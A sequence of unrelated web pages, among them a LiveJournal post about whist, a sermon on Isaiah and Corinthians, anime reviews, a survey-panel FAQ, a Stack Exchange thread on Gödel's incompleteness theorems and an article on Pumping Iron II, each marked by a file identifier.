northanger (northanger) wrote, Friday, October 17, 1856. Took a pleasant walk to the Fort with Mr. and Mrs. P.[utnam], Mr. N.[ell] and Sarah [Cassey Smith], —Had a game of whist. [+] #65100-BIRTWHISTLE, #543-CHARLOTTE, #8077-HOYLE (codified whist rules; "according to Hoyle" means "by highest authority"), #21014-DAISHI (Great Teacher), #3315-CHANT. yesterday looked up 17-Oct entry in Charlotte Forten Grimké's journals & played some mental whist (a tariki kinda thing). when i stopped chanting in 1994 & returned my gohonzon i thought that door was closed for good. so the last week has been very interesting. Four of Wands ~ Completion is an opportunity to look at the past in a new way (zange). two issues came up. someone told me that no one believed i actually chanted a million daimoku (believe me, i totally empathize rejection). i practiced from 1983 to 1984, this occurred in the first year. realize now part of me knew then how pathetically impossible it was to get that million daimoku prayer answered, but i chanted anyway. the response wasn't a total surprise—hurtful—but not a surprise. second thing. yesterday came across Os Guiness' The Striptease of Humanism: an effective alternative, a credible alternative ... appreciate the need for an alternative ... chart the alternative ... alternatives must grapple ... [there's a third way] realism without despair, involvement without frustration, hope without romanticism. developed this "black hole" strategy toward the end of my practice. i would work at a company in such a way that when i left i'd leave a big hole. totally into it, very effective & empowering. did this for a couple jobs (kept doing doing it even after i stopped chanting) until starting a company with a family member & suddenly ... knew how destructive it was. absolutely clueless about how to generate myself. short story: things did not go well. these two things are connected & still causing me problems. so what was i chanting for? black girls (this was the 70/80s) don't get to direct hollywood blockbusters & i knew i didn't have the necessary psychological makeup to break down any of those walls. it was tough for women period (still is). think it was Joan Churchill who had a hard time joining the US Camera Guild (think the guy literally said, "over my dead body"). what i'm deeply grateful for today is having a place to put my impossible desire & now (finally) taking a real good whack! at my #3811-KARMA. i add new asteroids to the 827 List at these turning points. i've got a good list going this time, but i need some help allowing something to come in on my i don't know side (i know i'm missing something!). currently on this list are the names of my family, [info]elnigma's Great Aunt Dottie (#9721-DOTY) who passed away 31-Oct-2005, [info]brianberge's one-year old nephew J.M.M. (#10195-NEBRASKA) who passed away 02-April-2006, #18679-HEATHERENAE for [info]mr_six's & Heathenry &c. Lenin is on here, i'm on here, Marx is too & everyone from Wonderland. i invite everyone on my friend's list to play a little virtual whist with me & expand this hypersigil. select one asteroid (comets & stars ok, check against current list) & give me a brief description about what it means to you. if you write something in your journal i'll link to it. this is also open to everyone including Anonymous. we live in interesting times & #916-AMERICA is about to vote (#10961-BUYSBALLOT). what's important to you? what are you passionate about? what makes you see red, green and/or all the colors of the rainbow? what needs saying, what needs hearing? what am i missing? [DEADLINE] :: Sunday, 22-Oct @ 5AM PDT; plugging in new asteroids for Cycle #36 (Eureka). ACROSS the land a faint blue veil of mist Seems hung; the woods wear yet arrayment sober Till frost shall make them flame; silent and whist The drooping cherry orchards of October Like mournful pennons hang their shrivelling leaves Russet and orange: all things now decay; Long since ye garnered in your autumn sheaves, And sad the robins pipe at set of day. Now do ye dream of Spring when greening shaws Confer with the shrewd breezes, and of slopes Flower-kirtled, and of April, virgin guest; Days that ye love, despite their windy flaws, Since they are woven with all joys and hopes Whereof ye nevermore shall be possessed. [+] Let nice Piquette the boast of France remain, And studious Ombre be the pride of Spain; Invention’s praise shall England yield to none, While she can call delightful Whist her own. [+] Phileas Fogg: My dear, I must ask you to leave these precincts at once. No woman has ever set foot in the Club. Aouda: Why not? Phileas Fogg: Because that could spell the end of the British Empire. [+] DEAR VANITY, —Just a year ago last Christmas, two young ladies—smarting under that sorest scourge of feminine humanity, the having 'nothing to do'—besought me to send them 'some riddles'. But riddles I had none at hand, and therefore set myself to devise some other form of verbal torture which should serve the same purpose. The result of my meditations was a new kind of Puzzle—new at least to me—which, now that it has been fairly tested by a year's experience, and commended by many friends, I offer to you, as a newly-gathered nut, to be cracked by the omnivorous teeth which have already masticated so many of your Double Acrostics. [+] In the game of "Whist for two," usually called "Correspondence," the lady plays what card she likes: the gentleman simply follows suit. If she leads with "Queen of Diamonds," however, he may, if he likes, offer the "Ace of Hearts": and, if she plays "Queen of Hearts," and he happens to have no Heart left, he usually plays "Knave of Clubs." [+] THE POPULARITY of bridge whist began a quarter of a century ago with the older people and has increased slowly but steadily until it is scarcely an exaggeration to say that those who do not play bridge, which means "auction," are seldom asked out. And the epidemic is just as widespread among girls and boys as among older people. Bridge is always taken seriously; a bumble puppy game won’t do at all, even among the youngest players, and other qualifications of character and of etiquette must be observed by every one who would be sought after to "make up a four." [+] But cards are war, in disguise of a sport. [+] tenace :: Games A combination of two high cards of the same suit separated by two degrees, such as the king and jack of hearts, especially in a bridge or whist hand. ETYMOLOGY: French, from Spanish tenaza, tongs, tenace, from tenaces, pl. of tenaz, tenacious, from Latin tenax, tenac-. See tenacious. tenacious :: 1. Holding or tending to hold persistently to something, such as a point of view. 2. Holding together firmly; cohesive: a tenacious material. 3. Clinging to another object or surface; adhesive: tenacious lint. 4. Tending to retain; retentive: a tenacious memory. ETYMOLOGY: From Latin tenax, tenac-, holding fast, from tenre, to hold. See ten- in Appendix I. ten- :: To stretch. Derivatives include tendon, pretend, hypotenuse, tenement, tenor, entertain, lieutenant, and tone. I.1.b. portend, from Latin portendere, "to stretch out before" (por-, variant of pro-, before; see per1), a technical term in augury, "to indicate, presage, foretell." 2. Suffixed form *ten-yo-. from Greek teinein, to stretch, with o-grade form ton- and zero-grade noun tasis, a stretching, tension, intensity .... 4. Suffixed full-grade form *ten-tro-. a. tantra, from Sanskrit tantram, loom; b. sitar, from Persian tar, string. 5. Basic form (with stative suffix) *ten-e-. tenable, tenacious, tenaculum, tenant, tenement, tenet, tenon, tenor, tenure, tenuto; abstain, contain, continue, detain, entertain, lieutenant, maintain, obtain, pertain, pertinacious, rein, retain, retinaculum, retinue, sustain, from Latin tenere, to hold, keep, maintain ("to cause to endure or continue, hold on to"). 6. Extended form *ten-s-. Suffixed zero-grade form *tns-elo-. tussah, from Sanskrit tasaram, shuttle. COME unto these yellow sands,   And then take hands: Court'sied when you have, and kiss'd,—   The wild waves whist,— Foot it featly here and there; And, sweet sprites, the burthen bear.       Hark, hark!         Bow, wow,       The watch-dogs bark:         Bow, wow.       Hark, hark! I hear   The strain of strutting chanticleer   Cry, Cock-a-diddle-dow! [+] Tags: whist • Post a new comment Anonymous comments are disabled in this journal default userpic Your reply will be screened
global_01_local_0_shard_00002368_processed.jsonl/41243
Our two lessons this evening provide us with contrasting pictures of people in their relationship with God and each other, understood in sexual terms. Now it is an accusation often levelled at the Church that it is all we are concerned with, though that is in fact far from the case, and whereas the Victorians pretended that sex did not exist, modern humanity especially since the 1960s has acted as though nothing else does.        In our first lesson the Prophet Isaiah is looking forward to a future when Israel, having returned to God and been purified, is understood as a land wedded to God. It looks forward to a Messianic future, one which we as Christians see as brought to fulfilment in Jesus Christ, who is the righteousness and the salvation of Israel, who gives himself for love of us, that we may be pure and holy and through Him. The image of married love and intimacy is profound: it speaks of mutual love and generosity, it is what God wills for our human flourishing, it is the place for children to be born and brought up, in love.        Whereas the Church in Corinth is in a really bad way: as well as taking each other to court, Christians would appear to be behaving in a way which falls short of Christian morality. They appear to have understood freedom from the law as though it were freedom from any law: extreme antinomianism – that anything goes; that they can just do as they please. This is, however, not the case. How we live our lives, and what we do with our bodies matters. For those of us who have been washed, sanctified, and justified in the name of the Lord Jesus Christ and by the Holy Spirit, we are called to be in Christ, clothed with him, and living a new life, conformed to him and not to the ways of the world.        There are some in the Church in Corinth who have been arguing that all things are lawful, to which Paul has to counter that while something may be lawful, it may not be advantageous, as Christians like others in the ancient world would generally subscribe to an idea of virtue ethics, put simply ‘you are what you do’ or in greater depth, our actions help form our moral character – we become what we do habitually, and thus the more we do the right thing, the more we are disposed to do such things, and thus to progress in virtue.        While they claim the freedom from being made subject to anyone, they would appear to be subject to base appetites, to lust and gluttony, neither of which help in our relationship with Jesus Christ. Thus the proper place for sexual activity remains holy matrimony, where a man and woman are joined; they become one flesh, in a life-long exclusive union where children may be born.        Christians are to love their bodies, as ours is not a spiritual religion, which despises the flesh, but which rather wishes to see it used for the glory of God and for our mutual flourishing. We receive the Holy Spirit and the grace of God, and the theological virtues of faith, hope, and charity in our baptism, where we are regenerate, born anew in Christ, we are not our own in that we now live for God, and we glorify him in our bodies by how we live our lives.        The messianic hope expressed in this evening’s first lesson finds its fulfilment in Christ and in the Church which is his body, we were bought at a price, not thirty pieces of silver, but life of God’s only-begotten Son, who suffered and died for us, for you and for me, and for the sins of the whole world, past, present, and future. How else can we begin to try and repay such love and such generosity than by living the life that God wills for our human flourishing – gentle, generous, and exhibiting the same costly love which Christ showed to us.  This glorifies God and shows due respect to the wonders of creation and salvation, it helps to form our moral character and to live out true faith and charity in our lives, supporting one another, praying for each other, forgiving one another when we fail, and being built up in love, as living stones, a temple to God’s glory. And by living out our faith in our lives we will proclaim the truth and the freedom of the Gospel – others will come and see and enter into the joy of the Lord and give glory to God the Father, God the Son, and God the Holy Spirit, to whom be ascribed, as is most right and just, all might, majesty, glory, dominion, and power, now and forever. Leave a Reply WordPress.com Logo Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/41255
DONCAT Is Just Trying “To Be Someone” Photo by Liz Bretz Listen to his new song here The bigger the dream, the bigger the possibility of failing. But that shouldn't be a reason not to shoot for the moon. If anything, it should serve as fuel to go and do the damn thing! After all, failure isn't found in trying, but rather in not trying at all. That's where Duncan Nielsen's writing from in his new DONCAT song, "Try To Be Someone." The song, lifted from DONCAT's forthcoming album Preservation of the Spirit, follows a self-discovery journey. As Nielsen says, "'Try To Be Someone' tells the story of a young hopeful headed to Los Angeles in search of fame, but more so reinvention." It's a theme that fascinates the San Francisco-based singer-songwriter—the "pursuit of fame as a means of personal growth." Because, at the end of the day, what does it mean to "be someone"? Fame is fleeting and intangible. "[It's] dependent on strange hype," he adds.  And hype, of course, fades. But self-worth? That can stay forever, as long as you work on it. So instead of trying to be someone for other people, be your own someone. May DONCAT's latest inspire you to do so. Preservation of The Spirit drops April 27 via Marble Eye Music.
global_01_local_0_shard_00002368_processed.jsonl/41262
uBlock Origin Firefox Extension uBlock Origin vs AdBlocker vs Pi-Hole The topic of ad blocking as a security measure is often misunderstood. Besides the fact that ads can be annoying they can also bring with it malvertising. Malvertising is advertising that can be dangerous to your computer, mobile device, browser, or any device. Why do I need it? Pop-up and […]
global_01_local_0_shard_00002368_processed.jsonl/41267
XML Sitemap URLPriorityChange frequencyLast modified (GMT) https://oit.utk.edu/general/employment/course-delivery-grad/70%Daily2019-09-09 14:48
global_01_local_0_shard_00002368_processed.jsonl/41274
Industry Brief: ThreatQ for Healthcare Industry Brief: ThreatQ for Healthcare Healthcare organizations are attractive targets for today's hackers due to reams of personal information providers process and store. These electronic health records are like digital gold to adversaries who sell them on the black market. Download the ThreatQ for Healthcare Industry Brief to learn: • The key challenges of securing healthcare data; • How threat intelligence can provide valuable details on attackers tactics, techniques and procedures (TTPs); • How ThreatQ brings order to healthcare security operations. Around the Network
global_01_local_0_shard_00002368_processed.jsonl/41299
This time I review: Life’s a rollercoaster, man! Read the rest of this entry ACCA 13-Ku Kansatsu-Ka – 04-06 Review Guess this character’s not a big fan of haircuts… ACCA 13-Ku Kansatsu-Ka04-06: Jean’s in deep trouble. A lot of people are still convinced that he’s instrumental to the coup d’etat movement. Mostly, probably, because he seems to make a habit of getting into trouble. Not that’s it’s hard to get into trouble as an inspector considering how imbalanced and flawed those 13 nations are. A nation that embraces isolation for the sake of abandoning innovation? Just how culturally paranoid do you have to be to do something like that?! And the rest try to bribe Jean, so that he would reveal useful information and not look too closely at what some part of the elites in these 13 nations are planning. Guess it pays off after all to be at the heart of a conspiracy against your will… Read the rest of this entry This time I review: Yep, it turns out, it’s that kind of series. Read the rest of this entry Kimi No Na Wa. – Review While this is a movie that tries its best to base its supernatural elements on Shintoism, you probably shouldn’t spend too much time about whether the mechanics of the supernatural make sense in this movie. Also, instead, how about you just enjoy the view! Kimi no Na wa. : Look, destiny can be a real bitch sometimes, you know? There’s a person out there who you’re meant to be with! ‘Great!’, you might say, ‘Spares me the hassle of dating!’. But here’s the catch: This person lives hundreds of miles away. And destiny can’t just, like, write on your  bedroom-wall “Hey, dumdum, your true love is over there!”. No, gotta make it complicated! Enter Mitsuha and Taki. The former lives in the countryside and the latter lives in Tokyo. Occasionally, they bodyswap. Well, I guess, everybody needs a hobby. Anyway, they’re meant for each other. I mean, it’s better than the plot to Serendipity (the movie from 2001 that turns the concept of ‘meet-cute’ into a whole movie for whatever reason), right? Read the rest of this entry This time I review: Read the rest of this entry This time I review: Read the rest of this entry Review-Roundup: Fuuka 03, Kuzu no Honkai 01 I get it! He’s gay! Is that supposed to become some sort of running gag that the good-looking dude is gay…? This time I review: Fuuka 03: Ah, youth… isn’t it nice? You need money and there’s just some part-time-job waiting for you around the corner! Yuu, Fuuka and the gay guy are traveling to the beach to earn some much-needed cash (which they couldn’t get from their parents because… uh, I guess, they’re not part of the target-demographic of this series). There’s just one problem! Yuu sucks at… Well, actually he just sucks as a person in general. But Fuuka motivates him to rise above and for once act like a decent person. What a man! And later he fails at rescuing Fuuka, so he gets rescued by her instead. (Go figure how that makes sense) Hey, at least, there’s still a J-Pop-idol who wants to jump Yuu’s wiener, right? Kuzu no Honkai 01: Love sucks. Especially if it’s unrequited love. Two people with that fate (nearly) become “friends with benefits” while pretending to be a couple. Read the rest of this entry Winter 2017 – First Impressions Pt. II Sure, why wouldn’t you let a random high-school-student help you with a broken car? Surely, if a stranger tells you he can fix your car, you just let him work on it – even if said person seems to be just a teenager. It all makes perfect sense! Some more first impressions. Among them one of the worst series so far: Handshakers. I wouldn’t be surprised if this shit got canceled midway through the season to be replaced by some re-runs. I mean, who is supposed to stomach the grotesqueness of that series for an entire season?! Read the rest of this entry Winter 2017 – First Impressions Read the rest of this entry Flip Flappers – 13 Review flip 1301 Ah, of course, blood… How else are you supposed to make anything look (supposedly) badass? Flip Flappers 13: Turns out Cocona’s grandma is a robot, so nobody’s surprised to find out that her mother is some weird science-experiment-monster. But things are a bit more complicated than you’d think and her mother is a good guy but during the escape, she turned into a bad guy. Go figure what Cocona is supposed to do about that. As all bad mothers, Mimi wants to smother her daughter Cocona in comfort. Naturally, Cocona rejects this since she had just accepted Papika’s proposal (which teaches you something about where persistence gets you in the dating-world). What follows is a lot of fighting. But who can possibly know what will happen when the good guys battle the villain during the last episode of a series… Read the rest of this entry
global_01_local_0_shard_00002368_processed.jsonl/41320
Panel Champ If you have a question that isn't listed, e-mail us at How to View/Redeem Rewards Log in by selecting your country of residence than Select "YOUR PROFILE" → Select "REDEEM REWARDS" Need help with our panel, log in or registration? If you are a member of one of our panels, please look at the panelist FAQ supported by our partner, Cint. If you cannot find your answer, please submit your request via the “submit a request” function on the Cint support FAQ page. Why join the PanelChamp Panel? You have opinions, our clients want to know them. We will pay you for them. Plus, the PanelChamp community is fun. How do I join? Click Here to join our panel. How often do I need to participate? As much or as little as you like. It's entirely up to you. We stress that you get involved in topics that interest you. There is no minimum requirement in order to receive your incentive. How do you know it's me, when I say it's me? We know. We utilize the latest and greatest in software to weed out the bad apples. Where do I go to change my e-mail address or other information? When you join PanelChamp, we will e-mail you an ID that you will use to reference any point of communication. Quest is working on a portal that will allow panelists to self update any details and track their progress, studies completed, rewards, etc., but for now, please send an e-mail to and include your ID with your query. Will my e-mail address be kept safe? Privacy is key to the successful management of any panel. Your security ensures our success. We don't want to give your information away as we want you all to ourselves! For a detailed copy of our privacy policy, please refer to our privacy policy. How do I redeem my rewards? Paypal. As soon as a study wraps up, you are immediately compensated at the study agreed rate as noted in your e-mail invitation. Why Paypal? Why Not? Amazon GC’s also available to residents of the US and UK. How do I setup a Paypal account?
global_01_local_0_shard_00002368_processed.jsonl/41349
PetVet, Pippa Dr Pippa Elliott BVMS MRCVS Award Nomination! Purrs, pruups, and chin rubs! I’m doing a happy dance because Petful editor, Dave Baker, had nominated one of my articles for an award. He entered the piece for the Fear-Free Cat Enrichment Special Award, hosted by the Cat Writers Association. Preventing Behavior Problems in a Kitten: What You Need to Know Follow the link above to read the article. Fear Free practice is something that’s very close to my heart, so a nomination in this category is especially humbling. Many thanks to editor-in-chief, Dave Baker for thinking of me. The result to be announced in May 2019. Helping kittens start life on the right paw %d bloggers like this:
global_01_local_0_shard_00002368_processed.jsonl/41355
Gödel's incompleteness theorems show that arithmetic is either inconsistent or incomplete, and that arithmetic cannot prove its own consistency. It is useful to believe that arithmetic is consistent, and therefore also incomplete, but there are other points of view. It seems to me that both views are compatible with the consistency of first-order logic itself. Thus, I am wondering: What is the autopsy of the efforts to revisit logic in the wake of Gödel? Is there any possible world in which 2+2=5, even if the shortest proof of it is gigabytes long, and individually we have no time to verify it without use of a computer? How do contemporary philosophers interpret Gödel as applied to this specific issue? • 1 I am having a lot of trouble parsing exactly what it is you are asking. What do you mean by 'consistency' of first-order logic (FOL)? FOL is sound and complete for standard classical deductive systems (which strongly axiomatize it) - but I can't see what sense of 'consistency' you are talking about here? When you ask: "What is the autopsy of the efforts to revisit logic in the wake of Godel?" I have no idea what you mean. And I don't understand what the 'specific issue' refers to. I'm sure there's a very interesting question here - could you please clarify and explain? – Chuck Jun 11 '11 at 20:41 • By consistency of FOL I just mean that we can't prove falsehood, so logic is not a science. That is a vacuous statement but it doesn't apply to arithmetic where other non-logical axioms are assumed. I was thinking of the development of intuitionistic logic and also abstract algebraic logic. Have any of the alternative or generalized logics developed in the last century had any impact on philosophy and can they help inform whether or not arithmetic is a science? – Dan Brumleve Jun 11 '11 at 21:01 • 1 There is some confusion here I feel - probably because of the admittedly confusing terminology. You have to bear in mind that when we speak of a 'logic' we have three things in mind: Language+Deductive System+Semantics. So Intuitionistic Logic (IL) is a first-order logic too if we take logic to be language+semantics - that is to say FOL=IL modulo language+semantics. IL differs with (what is commonly referred to as) FOL only in the choice of deductive system - e.g. in IL there is no RAA or double-negation elimination etc etc. Now are you asking: Did GT provide reasons to consider alternative – Chuck Jun 11 '11 at 22:02 • 1 (cont.) deductive systems for the underlying first-order logic of a theory of arithmetic? And if yes how have these systems affected philosophical perceptions of arithmetic? – Chuck Jun 11 '11 at 22:04 • 1 That is the broad part of the question; also I am asking about the specific thought experiment of having an actual proof of the inconsistency of PA which is too long or requires too much effort for a human to verify but can be verified easily by a computer. I can see there are a lot of alternatives here: conclude that PA is actually inconsistent, or that PA is actually consistent but there is a new law of physics causing the verification to falsely succeed, or even that no large computations can be trusted and all knowledge is finite, etc. What conclusion is the most plausible? – Dan Brumleve Jun 12 '11 at 0:01 I think the question is a little unfocused. That said: Gödel didn't show arithmetic inconsistent or incomplete. Rather, he showed that any formal system with expressive power adequate for expressing arithmetic was either inconsistent or incomplete and that no such system could prove its own consistency. There are infinitely many proofs that 2+2=5 and they can be as short as you like. But, unless there really is an undetected inconsistency in a system of arithmetic (say First Order Peano Arithmetic), they will all be proofs in a system of "arithmetic" that has either false axioms or unsound rules of inference. I don't know what a possible world in which 2+2=5 would be like. It is epistemically possible that 2+2=5 is provable in FOPA, but, since FOPA also can prove 2+2=4 and ~(4=5), that would show FOPA inconsistent. Gentzen did prove the consistency of Peano Arithmetic, but his proof relies upon mathematical induction up to epsilon-0, and is thus no use in persuading those sceptical of the consistency of PA. It is, however, an important contribution to proof theory, setting an upper bound on the principles on needs to show PA consistent. (By Gödel's second incompleteness theorem, that bound must be higher than the system of PA itself.) • In the inconsistent world the negation of the conjunction of the Peano axioms would be a tautology. Without induction as a logical inference rule, the same applies to the finite axioms of Robinson arithmetic. Presburger arithmetic is a justification for ~(2+2=5) but it doesn't justify 2*13=26 because "*" is not part of the language. I'm interested in understanding what such an inconsistent world would be like or what would be so absurd about it. – Dan Brumleve Jun 11 '11 at 6:18 • How can an axiom be false? – Ben Hocking Jun 11 '11 at 11:47 • 3 Formally, you can make any sentence in the language of a system as an axiom. In a formal proof system, an axiom is simply a sentence which can be written down at any point in a proof with no further justification than that it is an axiom of the system. Of course, one typically doesn't want to have adopted falsehoods as axioms. It can, and does, happen, though. Frege's Basic Law V (which was an axiom) in his Grundgesetze system was shown, by Russell's Paradox, to be false. Likewise, Euclid's Firth Postulate would seem to be false if we take the axioms to characterize physical space. – vanden Jun 11 '11 at 15:54 Godels theorems are about the expressive power of formal languages; and only tangentially touches on the nature of truth; for mathematicians, it's importance is in prompting the growth of a new field: model theory. Though we don't have a world where 2+2=5; though if we did, we should ask what does it mean? Is it also the case that 2+2=4? So that 4=5? And what would this mean ... ? Though we do not have a world where 2+2=5; we do already have a world in 2+1=0 and 2+1=3 - this one - it's a world where we have the cyclic group of order three; and many others besides. The importance of non-Euclidean geometry is generally noted in contrast to that of the exemplary geometry - Euclidean geometry; and this by negating the parallel axiom. What is not noted, is the importance of non-arithmetic arithmetics - groups, rings, fields; they are as usefully important as the usual, exemplary one; to give it a name - Peano Arithemetic. Mathematical logic as opposed to logic has moved on; logic as Heidegger points out: has the status of a secure and trustworthy science; it has taught the same thing since antiquity. New concepts in mathematical logic would include, say, Topos theory; that demonstrates Cohens forcing technique as a species of geometry. Your Answer
global_01_local_0_shard_00002368_processed.jsonl/41362
Pumping Iron II and the Birth of Female Bodybuilding Who can forget Pumping Iron? The iconic bodybuilding movie which pitted an enviably charismatic Arnold Schwarzenegger against Lou Ferrigno, the man who later became the Incredible Hulk. A tragic epic of Homeric proportions, the initial Pumping Iron has been credited with helping bodybuilding become a more mainstream sport or at least pursuit, in the eyes of many. Furthermore it became a source of inspiration for hundreds of thousands of gym goers seeking to replicate the muscularity, determination and definition of the men on screen. In short, Pumping Iron helped normalise and accelerate male bodybuilding’s popularity. But what then of Pumping Iron’s sequel Pumping Iron II, which focused exclusively on female bodybuilding? Why was it made? What impact did it have? And just where can one watch the original? The Backstory Though inspired and produced by the same team behind Pumping Iron, the backstory to Pumping Iron II differed quite significantly from its male counterpart. In the first instance, the docu-drama did not centre around the Ms. Olympia but rather the 1983 Caesar’s World Cup. Never heard of it? Don’t worry, no one else has…the Contest was created specifically for the movie. This stunted the movie right at its beginning. Whereas the original film could hark back to a decade’s worth of tournaments and incredibly physiques, the sequel had to content itself with an artificial trophy. That the title Pumping Iron II was chosen without the complimenting Olympia contest was somewhat irksome for many. As such, the Tournament somewhat lacked the prestige of the Olympia showcased in the original Pumping Iron. Similarly as this contest was female only, it largely negated the number of male Bodybuilding stars who could have appeared in the movie. Had more male bodybuilders appeared in the film, the somewhat misogynistic reception the documentary endured may have been different. Musings aside, the movie did boast a brief posing appearance from the former Mr. America Steve Michalik. The Story Itself Seeking to ground itself largely with gender issues, Pumping Iron II asks what level of muscularity is acceptable for women? The dichotomy between speak, athletic builds and more muscular figures is represented within the documentary itself in the form of Rachel McLish, a bonafide bodybuilder and Bev Francis, an Australian powerlifter invited to compete in the competition. Throughout the film, viewers are forced to consider issues of gender, sexuality and personal autonomy. Without revealing too much, it’s fair to say that far from subtle, these issues are shunted down the viewer’s throat at every possible turn. The Reception Whereas Pumping Iron has been credited with reviving or mainstreaming male bodybuilding, the same is not true for Pumping Iron II. There were two reasons for this. In the first instance, the documentary was criticised for its deception. As viewers of the documentary will undoubtedly figure, the hands of the director Charles Gaines are all over this work. One small but significant instance came during the judging rounds of the Caesar’s World Cup. Seeking to demonstrate the supposed disinterest exhibited by males in the sport, Gaines depicted Oscar State soundly asleep at the judging table. There was only one problem with this clip. State was asleep backstage following the prejudging rounds and not during the judging itself. While this may seem trivial, upon the movie’s release in 1985, State had passed away and could thus no longer defend himself. Cue Ben Weider furiously denouncing Charles Gaines and the movies’ integrity. Similarly the rivalry between the two protagonists McLish and Francis has been seen as entirely artificial. In the second instance, owing to the movie’s overtly feminist tones, the movie’s reception was perhaps somewhat stunted. Though credited with inspiring individual female athletes to join the sport of bodybuilding, the general public tended not to embrace the movie in the way they had with Pumping Iron. In any case, the movie is a seminal bit of bodybuilding history and if you’re interested in checking it out, look no further than below! As always, happy lifting!
global_01_local_0_shard_00002368_processed.jsonl/41370
TODAY’S DAILY READING: Zechariah 1-2 & Proverbs 23 Old Testament: Zechariah 1- Return Zechariah 1:3 “Therefore say to them, ‘Thus says the Lord of hosts: “Return to Me,” says the Lord of hosts, “and I will return to you,”’ says the Lord of hosts.” After seventy years of captivity Israel was allowed to return to the land and begin to rebuild their broken down Temple. Millions had been taken captive and… Read More Zechariah 2- Problems and Solutions IMG_1244.JPGZechariah 2:10 Things looked bleak for Israel. After their defeat in battle, Jerusalem was destroyed and the Jewish people were taken… Read More Proverbs 23- Fly Away IMG_1246.JPGProverbs 23:4-5 “Do not overwork to be rich; Because of your own understanding, cease! Will you set your eyes on that which is not? For riches certainly make themselves wings; they fly away like an eagle toward heaven.” Riches are not evil in… Read More Leave a Reply You are commenting using your account. Log Out /  Change ) Google photo Twitter picture Facebook photo Connecting to %s
global_01_local_0_shard_00002368_processed.jsonl/41372
Version 4.3.3 Released Published on 9 November, 2016 Plandroid version 4.3.3 has now been released. This version allows you to specify your Automatic Design settings on a per design mode basis. So you can use certain parts for an evaporative system, and other parts for a reverse cycle system, for example. Additional suppliers are now supported with direct ordering - Ductair, and Climat users. The major addition for this release is the large number of new and upgraded catalogs. Check the full release notes for details. Highlights in this version: Upgrade to new version now! Permanent url for this item: There are 0 comments. Add your own comment
global_01_local_0_shard_00002368_processed.jsonl/41377
The Epitome of Love The Epitome of Love When your heart is empty and a loved one is gone the struggle to get your feet on the ground seems so long When the pillar you stood on is kicked from under your feet and your body is afflicted and life seems incomplete When you think joy is back But you’re faced with attack Reading makes no sense It all seems a pretence When tears flow for reasons confusingly unknown Could it be from the seeds one has previously sown? When black becomes grey and white becomes cream And all you really want to do is scream When there seems to be no purpose seen And life feels like “it has already been” When nothing seems to motivate And you are numbed in a tranquilized state He is holding you tight With all his might Because he does not want you to lose sight Yes in your plight He pleads “please fight” I am coming to take you home Some day John 16:22 So you have sorrow now, but I will see you again and your hearts will rejoice, no one will take your joy from you. RSV BJD 8 May 2011 Bubbles in the bath tub Making scrubbing fun Bubbles in a fish tank Gold fish passing one by one Bubbles in the froth Left in a cappuccino cup Bubbles being blown by children Up and up and up! Bubbles from a can of coke Mistakenly quite shaken Bubbles in my heart of joy Because I’m not forsaken
global_01_local_0_shard_00002368_processed.jsonl/41394
Post contrassegnati: community webinars We’ve got four new webinars from Jan 10th – Jan17th for your viewing pleasure! The topics include: * Walking through the development process for creating custom visuals for Power BI * Microsoft Flow administration, SharePoint Integration and best practices * PowerApps Custom APIs, Gateways and Data sources * How to build production ready event application in less than a week with PowerApps » Altre informazioni Nov 1 Webinar: Big Data with Power BI, HDInsight, and Datameer Power BI is a fantastic data visualization, transformation, and discovery product, but it’s not designed for “Big Data”-scale datasets. Meanwhile, Azure HDInsight is an impressive cloud-based Hadoop and Spark distribution that works at scale, but it isn’t designed to be friendly for business users the way Power BI is. In this webinar, Andrew Brust will show how you can leverage the scale of HDInsight and the ease-of use of Power BI with Datameer, part of the Azure HDInsight Application Platform. If you’re a Power BI fan, and you want to do Big Data analytics without learning the ins and outs of Hadoop and Spark, then don’t miss this webinar. » Altre informazioni
global_01_local_0_shard_00002368_processed.jsonl/41428
From PsychonautWiki (Redirected from Entactogen) Jump to navigation Jump to search Entactogens (also known as empathogens) are a class of psychoactive substances that produce distinctive emotional and social effects similar to those of MDMA. The term empathogen, meaning "generating a state of empathy", was coined in 1983–84 independently by Ralph Metzner and David E. Nichols as a term to denote a therapeutic class of drugs that includes MDMA and phenethylamine relatives.[1] Nichols later rejected this initial terminology and adopted, instead, the term entactogen, meaning "touching within", to denote this class of drugs, asserting a concern with the potential for improper association of the term empathogen with negative connotations related to the Greek root πάθος páthos ("suffering").[2] Additionally, Nichols wanted to avoid any association with the term pathogenesis.[3] Nichols also thought the original term was limiting, and did not cover other therapeutic uses for the drugs that go beyond instilling feelings of empathy.[4] The hybrid word entactogen is derived from the roots en (|within), tactus (touch) and -gen (produce).[2] Neither term is dominant in usage, and, despite their difference in connotation, they are essentially interchangeable, as they refer to precisely the same chemicals. History and culture History icon.svg This History and culture section is a stub. —Ralph Metzner, Ph.D., MAPS Subjective effects These effects are listed and defined in their own dedicated article below: List of entactogens See also External links • Nichols, D.E., Hoffman, A.J., Oberlender, R.A., Jacob P 3rd & Shulgin A.T. Derivatives of 1-(1,3-benzodioxol-5-yl)-2-butanamine: representatives of a novel therapeutic class. 1986. J Med Chem 29. 2009-15. • Nichols, D.E. Differences between the mechanism of action of MDMA, MBDB, and the classic hallucinogens. Identification of a new therapeutic class: entactogens. 1986. J Psychoactive Drugs 18. 305-13. 1. Holland, edited by Julie; Metzner, Ralph; Adamson, Sophia (2001). Ecstasy : the complete guide ; a comprehensive look at the risks and benefits of MDMA. Rochester, Vt: Park Street Press. p. 182. ISBN 978-0-89281-857-0.  2. 2.0 2.1 Nichols, D. (1986). "Differences Between the Mechanism of Action of MDMA, MBDB, and the Classic Hallucinogens. Identification of a New Therapeutic Class: Entactogens". Journal of Psychoactive Drugs. 18 (4): 305–13. doi:10.1080/02791072.1986.10472362. PMID 2880944.  3. Colman, Andrew M. (2015). Dictionary of Psychology - Oxford Reference (in English). doi:10.1093/acref/9780199657681.001.0001. ISBN 9780199657681.  4. Nichols, D; Yensen, R; Metzner, R; Shakespeare, W (1993). "The Great Entactogen - Empathogen Debate". Newsletter of the Multidisciplinary Association for Psychedelic Studies MAPS. 4 (2): 47–49. Retrieved 6 January 2015.
global_01_local_0_shard_00002368_processed.jsonl/41440
005 Double Identity In the fifth installment of The Quantum Leap Podcast, Albie and Heather discuss Season One episode six “Double Identity”. There’s first impressions, an episode recap, thoughts and opinions, listener feedback, a special announcement about our giveaway and much more.
global_01_local_0_shard_00002368_processed.jsonl/41454
